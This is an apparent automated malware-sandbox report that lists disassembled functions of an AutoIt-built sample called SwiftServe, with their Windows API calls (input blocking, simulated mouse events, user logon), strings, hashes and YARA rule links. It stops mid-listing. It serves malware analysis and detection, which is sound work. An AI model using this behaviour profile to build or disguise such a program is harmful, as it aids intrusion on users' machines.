Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 374c833120cc13fd78a0f9250ae2a61a5b85f89bd95925d3ea53e2c4286102f0
Instruction ID: dcd512689bec09fe36365b495df65169b805c7af3b0e8c0c403a86e99a7ac4a1
Opcode Fuzzy Hash: 374c833120cc13fd78a0f9250ae2a61a5b85f89bd95925d3ea53e2c4286102f0
Instruction Fuzzy Hash: CFE04F76210215AFD710AFAAE804E9BF7E8AF94760F018416FC49E7391DA70F9418B91

Function 00E851E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00E85205

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 7fe15541d6269edc4dc82db6f684bedfbf3b5d1c5891a689c379b562f441439c
Instruction ID: 8ae93712139ec616dcdfe381d37debf59a8e6ec9a1f27057e9a5b0b9b90990ed
Opcode Fuzzy Hash: 7fe15541d6269edc4dc82db6f684bedfbf3b5d1c5891a689c379b562f441439c
Instruction Fuzzy Hash: 27D052A7262E0A38EC2823248E0FFB70208E3007C4F846689700EB90C2ECD06889A631

Function 00E79369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E78FA7), ref: 00E79389

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 09b62f4815b6ee85e85a8bed18dcb378cc6b9c479b6bb629688c1b9b631890bd
Instruction ID: 58908afcfbd1161ce3d7a3bab490ea60453e3763e3ea9b36c880dd4cc4121a01
Opcode Fuzzy Hash: 09b62f4815b6ee85e85a8bed18dcb378cc6b9c479b6bb629688c1b9b631890bd
Instruction Fuzzy Hash: FED05E3226050EAFEF019EA4DC02EAF3B69EB04B01F408511FE15D50A0C775E835AB60

Function 00E60722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E60734

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7c148f47c3e393899f97a71ad692b3d460698d46d8cbd6882fa96957612d07a9
Instruction ID: b30c2023513f731c138e5e834ee4bc8fa10b0454ad4f0cd1b65d49690b944fb1
Opcode Fuzzy Hash: 7c148f47c3e393899f97a71ad692b3d460698d46d8cbd6882fa96957612d07a9
Instruction Fuzzy Hash: 6FC04CF1800119DBCB05DBA0D988EEF77BCAB04344F101555A105B2100D7749B448A71

Function 00E4A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E4A35A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fa0e58fb284803d47af900954f33d5df44626f55efd758c2214bca423776b788
Instruction ID: cf1f21728aab00323a3f4e59bbf5d57a7d4e24a6c26ca3a1b0205e2c1ced4ff6
Opcode Fuzzy Hash: fa0e58fb284803d47af900954f33d5df44626f55efd758c2214bca423776b788
Instruction Fuzzy Hash: 39A0113002020CAB8A002B82EC0888ABFACEB002A0B008020F80E000228B32A8208A80

Function 00E97EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00E97F45
DeleteObject.GDI32(00000000), ref: 00E97F57
DestroyWindow.USER32 ref: 00E97F65
GetDesktopWindow.USER32 ref: 00E97F7F
GetWindowRect.USER32(00000000), ref: 00E97F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E980C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E980D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9811F
GetClientRect.USER32(00000000,?), ref: 00E9812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E98165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E98187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981CD
GlobalFree.KERNEL32(00000000), ref: 00E981D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E981EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00EB3C7C,00000000), ref: 00E98200
GlobalFree.KERNEL32(00000000), ref: 00E98210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E98236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E98255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E98277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E98464

Strings

DISPLAY, xrefs: 00E982C7
static, xrefs: 00E9815F, 00E982B6
, xrefs: 00E983EA
AutoIt v3, xrefs: 00E98117

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: f9c4fad2f1f66c3fb6d304a0675883c782fc86ba941f273da121c60fdfb531e8
Instruction ID: db4cb36efc5812b668b58aca189179cc661ccc47a31c21f0ed0e4225e954ed14
Opcode Fuzzy Hash: f9c4fad2f1f66c3fb6d304a0675883c782fc86ba941f273da121c60fdfb531e8
Instruction Fuzzy Hash: 29027A71900219AFDB14DF69DD89EAF7BB9EF49310F008659F915BB2A1CB30AD05CB60

Function 00EA3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00EB0980), ref: 00EA3C65
IsWindowVisible.USER32(?), ref: 00EA3C89

Strings

GETCURRENTCOL, xrefs: 00EA3F66
SETCURRENTSELECTION, xrefs: 00EA3DF4
HIDEDROPDOWN, xrefs: 00EA3D3E
ADDSTRING, xrefs: 00EA3D54
EDITPASTE, xrefs: 00EA3F9D
ISENABLED, xrefs: 00EA3CA9
CURRENTTAB, xrefs: 00EA3CFB
GETCURRENTLINE, xrefs: 00EA3F2B
GETSELECTED, xrefs: 00EA3EE1
SHOWDROPDOWN, xrefs: 00EA3D1E
TABRIGHT, xrefs: 00EA3CDB
GETLINE, xrefs: 00EA3FD9
UNCHECK, xrefs: 00EA3EC1
GETCURRENTSELECTION, xrefs: 00EA3E21
SENDCOMMANDID, xrefs: 00EA4018
CHECK, xrefs: 00EA3EAB
ISVISIBLE, xrefs: 00EA3C75
GETLINECOUNT, xrefs: 00EA3F04
ISCHECKED, xrefs: 00EA3E77
SELECTSTRING, xrefs: 00EA3E44
FINDSTRING, xrefs: 00EA3DB4
DELSTRING, xrefs: 00EA3D87
TABLEFT, xrefs: 00EA3CC5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3880d664fd95e6e459cc9729f946c538b574864a049050846ec180359ae3ead4
Instruction ID: 43d39d9d45f297aba32ed189acd761bef6ce40d8561f12169b02e1a3bb2367c9
Opcode Fuzzy Hash: 3880d664fd95e6e459cc9729f946c538b574864a049050846ec180359ae3ead4
Instruction Fuzzy Hash: 7ED162702042158BCB04EF20D851AAAB7E1EF99354F24A459F9557F3E2CB31FD0ACB52

Function 00EAABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00EAAC55
GetSysColorBrush.USER32(0000000F), ref: 00EAAC86
GetSysColor.USER32(0000000F), ref: 00EAAC92
SetBkColor.GDI32(?,000000FF), ref: 00EAACAC
SelectObject.GDI32(?,?), ref: 00EAACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00EAACE6
GetSysColor.USER32(00000010), ref: 00EAACEE
CreateSolidBrush.GDI32(00000000), ref: 00EAACF5
FrameRect.USER32(?,?,00000000), ref: 00EAAD04
DeleteObject.GDI32(00000000), ref: 00EAAD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00EAAD56
FillRect.USER32(?,?,?), ref: 00EAAD88
GetWindowLongW.USER32(?,000000F0), ref: 00EAADB3

Part of subcall function 00EAAF18: GetSysColor.USER32(00000012), ref: 00EAAF51
Part of subcall function 00EAAF18: SetTextColor.GDI32(?,?), ref: 00EAAF55
Part of subcall function 00EAAF18: GetSysColorBrush.USER32(0000000F), ref: 00EAAF6B
Part of subcall function 00EAAF18: GetSysColor.USER32(0000000F), ref: 00EAAF76
Part of subcall function 00EAAF18: GetSysColor.USER32(00000011), ref: 00EAAF93
Part of subcall function 00EAAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAAFA1
Part of subcall function 00EAAF18: SelectObject.GDI32(?,00000000), ref: 00EAAFB2
Part of subcall function 00EAAF18: SetBkColor.GDI32(?,00000000), ref: 00EAAFBB
Part of subcall function 00EAAF18: SelectObject.GDI32(?,?), ref: 00EAAFC8
Part of subcall function 00EAAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00EAAFE7
Part of subcall function 00EAAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAAFFE
Part of subcall function 00EAAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00EAB013

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 5b2e26c57321a9c77169e5f1e9dc944a29c102db02270e6fdbca37bb684c2677
Instruction ID: 0d5ada172636e0ddef46d4b67fbe27f4326863115441bc7101ebf406e602b06e
Opcode Fuzzy Hash: 5b2e26c57321a9c77169e5f1e9dc944a29c102db02270e6fdbca37bb684c2677
Instruction Fuzzy Hash: 24A19171009301AFD7219F65DC08A6BBBA9FF89325F141B29F592BA1E0D731E848CF52

Function 00E22FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E23072
DeleteObject.GDI32(00000000), ref: 00E230B8
DeleteObject.GDI32(00000000), ref: 00E230C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E230CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E230D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00E5C77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E5C7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E5CBDE

Part of subcall function 00E21F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E22412,?,00000000,?,?,?,?,00E21AA7,00000000,?), ref: 00E21F76

SendMessageW.USER32(?,00001053), ref: 00E5CC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E5CC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E5CC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E5CC53

Strings

0, xrefs: 00E5CA72

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 95cfb62f78611b4ef478979f0a68e9418d6d1352cf8e44726f3f793ae024fba4
Instruction ID: 9cf22d8047838bdd6ab1956dfed4ddc7a1bf1f52062e3c015e9f609ce845e439
Opcode Fuzzy Hash: 95cfb62f78611b4ef478979f0a68e9418d6d1352cf8e44726f3f793ae024fba4
Instruction Fuzzy Hash: 2C12AD30600311EFCB25CF24D894FA6BBE1BF08305F246A69E955EB662C731E849CF91

Function 00E327FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FE6: std::exception::exception.LIBCMT ref: 00E4101C
Part of subcall function 00E40FE6: __CxxThrowException@8.LIBCMT ref: 00E41031

__wcsnicmp.LIBCMT ref: 00E3286A
__wcsnicmp.LIBCMT ref: 00E3287E
__wcsnicmp.LIBCMT ref: 00E32896
__wcsnicmp.LIBCMT ref: 00E328AE
__wcsnicmp.LIBCMT ref: 00E328C6
__wcsnicmp.LIBCMT ref: 00E328DE
__wcsnicmp.LIBCMT ref: 00E328F6
__wcsnicmp.LIBCMT ref: 00E3290A
__wcsnicmp.LIBCMT ref: 00E32948
__wcsnicmp.LIBCMT ref: 00E3295C
__wcsnicmp.LIBCMT ref: 00E32970
__wcsnicmp.LIBCMT ref: 00E32984

Strings

Bad directive syntax error, xrefs: 00E6FBD3, 00E6FBF0
#ce, xrefs: 00E3297E
', xrefs: 00E6FB9F
#pragma compile, xrefs: 00E32864
#cs, xrefs: 00E32904, 00E32956
#comments-end, xrefs: 00E3296A
#OnAutoItStartRegister, xrefs: 00E328A8
#include-once, xrefs: 00E328C0
", xrefs: 00E6FB89
#notrayicon, xrefs: 00E32878
Unterminated group of comments, xrefs: 00E6FCFA
#include, xrefs: 00E328D8
Cannot parse #include, xrefs: 00E6FCE5
#requireadmin, xrefs: 00E32890
#comments-start, xrefs: 00E328F0, 00E32942

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 1f6a11d80f614f372bc5714a7fbe6921af52bab68ac14efa161a4db9d6db1d5f
Instruction ID: a184ae89cd5aecebb5698e210b4e1e848ed4101389d1e105fdcb7d73b7ad3db3
Opcode Fuzzy Hash: 1f6a11d80f614f372bc5714a7fbe6921af52bab68ac14efa161a4db9d6db1d5f
Instruction Fuzzy Hash: F9A1BF34A40209BBCB24AF21EC46FAF7BB4AF45740F10602DFA45BB296EB71DA41D750

Function 00E97B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00E97BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E97C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E97CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E97CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E97D1D
GetClientRect.USER32(00000000,?), ref: 00E97D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E97D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E97D7C
GetStockObject.GDI32(00000011), ref: 00E97D8C
SelectObject.GDI32(00000000,00000000), ref: 00E97D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E97DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E97DA9
DeleteDC.GDI32(00000000), ref: 00E97DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E97DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00E97DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E97E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E97E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00E97E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E97E85
GetStockObject.GDI32(00000011), ref: 00E97E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E97E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E97EA5

Strings

DISPLAY, xrefs: 00E97D72
static, xrefs: 00E97D67, 00E97E7F
AutoIt v3, xrefs: 00E97D15
msctls_progress32, xrefs: 00E97E26

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8b9400cbac5580628ea8eb631e68e391029a731cb9218762ef595ca3f33cdd20
Instruction ID: 1c24d425e7087a9841b8d2ba46ea5c0bfa489106d629b4cdd3d4993ac0a4da8a
Opcode Fuzzy Hash: 8b9400cbac5580628ea8eb631e68e391029a731cb9218762ef595ca3f33cdd20
Instruction Fuzzy Hash: 4DA141B1A40619BFEB14DB65DC4AFABBBB9EB48710F044614FA15B72E0D770AD04CB60

Function 00E8B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8B361
GetDriveTypeW.KERNEL32(?,00EB2C4C,?,\\.\,00EB0980), ref: 00E8B43E
SetErrorMode.KERNEL32(00000000,00EB2C4C,?,\\.\,00EB0980), ref: 00E8B59C

Strings

SAS, xrefs: 00E8B548
RAID, xrefs: 00E8B53A
1394, xrefs: 00E8B51E
USB, xrefs: 00E8B533
iSCSI, xrefs: 00E8B541
Fibre, xrefs: 00E8B52C
\\.\, xrefs: 00E8B3B3
Network, xrefs: 00E8B47C
Unknown, xrefs: 00E8B45E, 00E8B502
SCSI, xrefs: 00E8B509
FileBackedVirtual, xrefs: 00E8B56B
MMC, xrefs: 00E8B55D
RAMDisk, xrefs: 00E8B468
Virtual, xrefs: 00E8B564
SSA, xrefs: 00E8B525
PhysicalDrive, xrefs: 00E8B3EA
Fixed, xrefs: 00E8B486
SSD, xrefs: 00E8B4C9
SATA, xrefs: 00E8B54F
CDROM, xrefs: 00E8B472
ATAPI, xrefs: 00E8B510
ATA, xrefs: 00E8B517
Removable, xrefs: 00E8B490

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 11d9aa5cabf76b3aa209a7b1d0eb0b30ce97cc1e4263582cd66c76a1bf85a9f9
Instruction ID: d0a790b0720f6a0c8262db920c89c13e2ac421c7211171417c62a207abc6a3c1
Opcode Fuzzy Hash: 11d9aa5cabf76b3aa209a7b1d0eb0b30ce97cc1e4263582cd66c76a1bf85a9f9
Instruction Fuzzy Hash: 4F516170B44309EB8B00FB60C9429AD77E2FB84744B257117E41EB73A1EB71AE42CB59

Function 00EAA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00EAA0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EAA1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00EAA1CC

Strings

0, xrefs: 00EAA209

